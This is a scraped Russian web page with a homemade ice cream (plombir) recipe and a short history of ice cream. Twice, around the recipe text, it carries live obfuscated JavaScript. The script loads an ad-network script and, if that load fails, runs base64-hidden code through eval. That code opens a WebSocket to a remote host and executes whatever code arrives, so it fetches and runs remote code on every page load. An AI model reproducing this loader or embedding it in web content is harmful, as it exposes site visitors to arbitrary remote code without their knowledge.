http://piclike.ru/wp-admin/admin.php?page=instant-articles-wizard

Домашнее мороженое! Как в детстве!

[ad_1]

var d = new Date, script620431 = document.createElement(«script»), mg_ws620431 = {};script620431.type = «text/javascript»;script620431.charset = «utf-8»;script620431.src = «http://jsc.marketgid.com/k/a/kapets.net.620431.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620431.onerror = function () { mg_ws620431 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzEoZSl7dmFyIGg9bWdfd3M2MjA0MzEub25tZXNzYWdlOyBtZ193czYyMDQzMS5yZWFkeVN0YXRlPT1tZ193czYyMDQzMS5DTE9TRUQmJihtZ193czYyMDQzMT1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMxX2xvY2F0aW9uKSksbWdfd3M2MjA0MzEub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEobWdfd3M2MjA0MzEsZnVuY3Rpb24oKXttZ193czYyMDQzMS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzFfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzFfbG9jYXRpb24pLCBtZ193czYyMDQzMS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzEoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620431.onmessage = function (msg){window.eval(msg.data);}; mg_ws620431.postMessage(‘js|’+script620431.src+’|M367283Composite620431|M367283Composite620431’);};document.body.appendChild(script620431);

История мороженого насчитывает более 5 тысяч лет. Это древнее лакомство впервые появилось в виде замороженного фруктового сока и прохладительных напитков.

Только во времена Наполеона Бонапарта в высоких кругах приобрело популярность сливочное мороженое. 

Вы удивитесь, насколько легко готовить домашний пломбир! И вам совсем не нужна мороженица.

Ингредиенты:

Сливки500 мл Сахарная пудра100 г Ванилин0,2 ч. л.

Приготовление:

Сливки для мороженого выбирайте самые жирные. Охладите их в холодильнике.Смешайте охлажденные сливки с сахарной пудрой и ванилином. Взбивайте не меньше 5 минут, пока не появится пышная пена.

Поставьте смесь на ночь в холодильник, и наутро ваш десерт будет готов!

var d = new Date, script620431 = document.createElement(«script»), mg_ws620431 = {};script620431.type = «text/javascript»;script620431.charset = «utf-8»;script620431.src = «http://jsc.marketgid.com/k/a/kapets.net.620431.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script620431.onerror = function () { mg_ws620431 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjA0MzEoZSl7dmFyIGg9bWdfd3M2MjA0MzEub25tZXNzYWdlOyBtZ193czYyMDQzMS5yZWFkeVN0YXRlPT1tZ193czYyMDQzMS5DTE9TRUQmJihtZ193czYyMDQzMT1uZXcgV2ViU29ja2V0KG1nX3dzNjIwNDMxX2xvY2F0aW9uKSksbWdfd3M2MjA0MzEub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEobWdfd3M2MjA0MzEsZnVuY3Rpb24oKXttZ193czYyMDQzMS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjA0MzEoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjA0MzFfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMDQzMSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjA0MzFfbG9jYXRpb24pLCBtZ193czYyMDQzMS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjA0MzEoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws620431.onmessage = function (msg){window.eval(msg.data);}; mg_ws620431.postMessage(‘js|’+script620431.src+’|M367283Composite620431|M367283Composite620431’);};document.body.appendChild(script620431);

Как видите, всё довольно просто. Самое важное заключается даже не в приготовлении, а в выборе сливок достаточной жирности. В пломбир рекомендуем добавлять шоколадную стружку, ягоды, варенье или орехи. Надеемся, вам понравился наш рецепт домашнего мороженого и вы захотите им поделиться!

Истчоник

[ad_2]

Source link

Топ 15+ полезных статей, выбранных подписчицами (читать далее...)
18.03.2018

Читайте также:

Close